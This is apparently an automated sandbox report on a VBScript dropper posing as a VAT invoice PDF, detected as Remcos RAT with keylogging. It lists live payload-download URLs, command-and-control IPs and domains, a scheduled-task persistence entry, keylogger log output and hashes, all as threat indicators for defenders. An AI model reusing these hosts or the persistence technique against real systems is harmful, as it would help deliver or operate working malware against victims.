                                                                        https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocwscript.exe, 00000000.00000003.1702704778.0000022E108CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://geoplugin.net/json.gp/CMSBuild.exe, 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbswscript.exe, 00000008.00000003.1974579887.00000266E0A81000.00000004.00000020.00020000.00000000.sdmp, LbtytfWpvx.vbs, talpe.vbs.6.drfalse
                                                                              high
                                                                              https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aawscript.exe, 00000000.00000002.1703853983.0000022E1098E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702472569.0000022E1098A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702503863.0000022E1098D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974450182.00000266DEB3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973834135.00000266DEAE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977779291.00000266DEB3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974417448.00000266DEB3B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974240401.00000266DEB38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aC=5wscript.exe, 00000008.00000002.1977694405.00000266DEADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.2026099087.000001CB43561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/koswald/VBScripttalpe.vbs.6.drfalse
                                                                                      high
                                                                                      https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnowscript.exe, 00000000.00000003.1702704778.0000022E108CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1703772168.0000022E108CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973920441.00000266DEA7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977583212.00000266DEA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2026099087.000001CB43561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410alwscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1703826317.0000022E10929000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703033281.0000022E10929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnoc0wscript.exe, 00000000.00000002.1703772168.0000022E108CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              45.80.158.30
                                                                                              firewarzone.ydns.euNetherlands
                                                                                              13213UK2NET-ASGBtrue
                                                                                              178.237.33.50
                                                                                              geoplugin.netNetherlands
                                                                                              8455ATOM86-ASATOM86NLfalse
                                                                                              5.182.211.158
                                                                                              set.officialswrc.topNetherlands
                                                                                              64425SKB-ENTERPRISENLtrue
                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1578245
                                                                                              Start date and time:2024-12-19 13:18:09 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 6m 16s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:17
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:LbtytfWpvx.vbs
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:4dd53bc42716f9abe36ae85c8ca8ea4b_m_Factura de IVA,pdf.vbs
                                                                                              Detection:MAL
                                                                                              Classification:mal100.rans.troj.spyw.expl.evad.winVBS@21/10@7/3
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 50%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 99%
                                                                                              • Number of executed functions: 52
                                                                                              • Number of non-executed functions: 189
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .vbs
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 104.17.202.1, 104.17.201.1, 20.12.23.50, 199.232.210.172, 52.165.164.15, 192.229.221.95, 20.242.39.171, 20.109.210.53, 13.107.246.63
                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, resc.cloudinary.com.cdn.cloudflare.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                              • Execution Graph export aborted for target MSBuild.exe, PID 6800 because there are no executed function
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                              TimeTypeDescription
                                                                                              07:19:05API Interceptor154x Sleep call for process: powershell.exe modified
                                                                                              07:20:39API Interceptor446918x Sleep call for process: MSBuild.exe modified
                                                                                              12:19:30Task SchedulerRun new task: TaskName path: wscript.exe s>C:\ProgramData\talpe.vbs
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              45.80.158.30173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • sws.swpushroller.eu/swsk/P4.php
                                                                                              Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • sws.swpushroller.eu/swsk/P4.php
                                                                                              178.237.33.50SEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              rem.pushswroller.euBBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                              • 45.80.158.30
                                                                                              173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • 45.80.158.30
                                                                                              Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                              • 45.80.158.30
                                                                                              bg.microsoft.map.fastly.netYinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                              • 199.232.214.172
                                                                                              gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 199.232.214.172
                                                                                              H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 199.232.214.172
                                                                                              1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                              • 199.232.214.172
                                                                                              8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 199.232.214.172
                                                                                              R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              s-part-0035.t-0009.t-msedge.netH2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 13.107.246.63
                                                                                              https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 13.107.246.63
                                                                                              https:/u8138501.ct.sendgrid.net/ls/click?upn=u001.I6qT8Dz69MhteW3705K6IU1LQ3g963Y3zRTsxDX4fVXYJ9RlDTttUZ-2F4W6jkAN-2BWeLmhXvVM33dZ8zdyDBxMHQ-3D-3D9QvK_A3EA-2BxZf4c3dsLaDejTByFLk41BCxE4Uo2OrX4mgE2MxlzcgK-2B0xybGuUTGyYJ5YjbiPC-2BiCJh5GAJwBubqkrvcCxWB69FtxO-2BVNGA0rN43JH8wByhnP3sbd4cxwRxIrAIlntQArpxTPdsHXXK7UbcIv5pqpXW-2FKGrctJVKLD8TvnmRv0E5Rim-2FIGs5oxbnurWR3Goko7UqMeLf2edTdmQ-3D-3DGet hashmaliciousUnknownBrowse
                                                                                              • 13.107.246.63
                                                                                              BJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
                                                                                              • 13.107.246.63
                                                                                              https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 13.107.246.63
                                                                                              http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUQlZDVFpDUkpSUUhUQzVRN0Q2MFNLQU1XTy4uGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 13.107.246.63
                                                                                              contract_signed.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 13.107.246.63
                                                                                              whacipher.exeGet hashmaliciousUnknownBrowse
                                                                                              • 13.107.246.63
                                                                                              s3hvuz3XS0.exeGet hashmaliciousCryptbotBrowse
                                                                                              • 13.107.246.63
                                                                                              661fW9gxDp.exeGet hashmaliciousLummaCBrowse
                                                                                              • 13.107.246.63
                                                                                              geoplugin.netSEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              ATOM86-ASATOM86NLSEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              SKB-ENTERPRISENLDwocLrf8iK.rtfGet hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.149
                                                                                              173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 5.182.211.149
                                                                                              Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 5.182.211.149
                                                                                              MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 5.182.211.149
                                                                                              bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                              • 45.148.121.112
                                                                                              bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                              • 45.148.121.112
                                                                                              i3LQkjkqOB.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                              • 45.148.121.112
                                                                                              grjD7lWffX.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                              • 45.148.121.112
                                                                                              systemd-udevd (deleted)Get hashmaliciousUnknownBrowse
                                                                                              • 45.148.120.142
                                                                                              systemd-udevd (deleted)Get hashmaliciousUnknownBrowse
                                                                                              • 45.148.120.142
                                                                                              UK2NET-ASGBBBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                              • 45.80.158.30
                                                                                              173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • 45.80.158.30
                                                                                              Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                              • 45.80.158.30
                                                                                              main_m68k.elfGet hashmaliciousMiraiBrowse
                                                                                              • 77.92.90.50
                                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                              • 88.202.185.180
                                                                                              la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                              • 46.28.54.10
                                                                                              173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 45.80.158.30
                                                                                              Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 45.80.158.30
                                                                                              loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                              • 80.209.188.4
                                                                                              ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                              • 45.80.158.23
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0eYinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                              • 5.182.211.158
                                                                                              raEyjKggAf.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                              • 5.182.211.158
                                                                                              H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                              • 5.182.211.158
                                                                                              8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              No context
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):144
                                                                                              Entropy (8bit):3.356983879725943
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:rhlKlyKHlfVlSFXQlFi5JWRal2Jl+7R0DAlBG45klovDl6v:6lZHlHSylc5YcIeeDAlOWAv
                                                                                              MD5:72BD4CD4DCB953CDEB4659742C480393
                                                                                              SHA1:BC9C50755E8D69968C498755E024795D591927EE
                                                                                              SHA-256:1B3D8580EB02D9D27D57BC44CD38F8C08B48F5C9DC9ED83FD7CC36F907ECC192
                                                                                              SHA-512:9FF2297BBB4ED74A641F0CD0C8830E24BFDF6BF99180B3410C28B7C4F0562A3B59519F31724BB7C92AEDBC6773C15AB228411F0E5602D008F4635B2F0C1344FA
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                              Preview:....[.2.0.2.4./.1.2./.1.9. .0.7.:.2.0.:.0.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                              Process:C:\Windows\System32\cmd.exe
                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (13291), with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):156194
                                                                                              Entropy (8bit):5.439573987456654
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:A8gVmI3b0mgfmWu+Dwe9VOv5iG5sVhQ30Wk+70wgA1a:A8gVde9VOv+
                                                                                              MD5:F46C154B82E9739BC0CB68C2B55C7141
                                                                                              SHA1:3CFFAE22113AA6D4525C702F164317713865AE49
                                                                                              SHA-256:648AA1ACBA635F9025C41CB23DEDD2E86C4ABCEC1AD91493E197A1B300C74E85
                                                                                              SHA-512:11F540C4D95DBF6C79D87EE29E400A0C73DB6D7FA196CEAC29051B7B9D6B8A7C858A4CB359B223BD5851B45EA3228928ECCE9A11C82C3C818A880F5F9DE91AD0
                                                                                              Malicious:true
                                                                                              Preview:Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string: filename filter for selecting integration test suites...Dim caption 'string: MsgBox/PopUp title bar text...Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators...Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables...Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push...Dim nextItem 'integer: current index of the prepItems array...Dim settings 'integer: controls MsgBox/PopUp behaviour...Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout...Dim flagFile 'string: filename of a temp file used by Setup.vbs...Dim versionLink 'web page with version info..Dim editor 'document editor..Dim powershell 'filespec of a
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):963
                                                                                              Entropy (8bit):5.018384957371898
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                                                              MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                                                              SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                                                              SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                                                              SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                                                              Malicious:false
                                                                                              Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):9434
                                                                                              Entropy (8bit):4.928515784730612
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                              MD5:D3594118838EF8580975DDA877E44DEB
                                                                                              SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                              SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                              SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                              Malicious:false
                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):1.0818136700495735
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlllulrlgll//Z:NllUml
                                                                                              MD5:BCE202BE96167104C292ABBA72DDA325
                                                                                              SHA1:2F7A5938BD57E9769440EDF0B6700DD001DF7AC6
                                                                                              SHA-256:680BC38EEF1B5175C4E728CEA436662498DC7F8E5570CBA66D7F9627AC0A0AEE
                                                                                              SHA-512:195CAC106561793B62A216DA442AA663BDEDCDFCA2920848583880B25489E03888AF732B6F07834DB3A4E892F24020CC8E2C37D54F1B61F20BEEFCCDB38F0189
                                                                                              Malicious:false
                                                                                              Preview:@...e................................................@..........
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
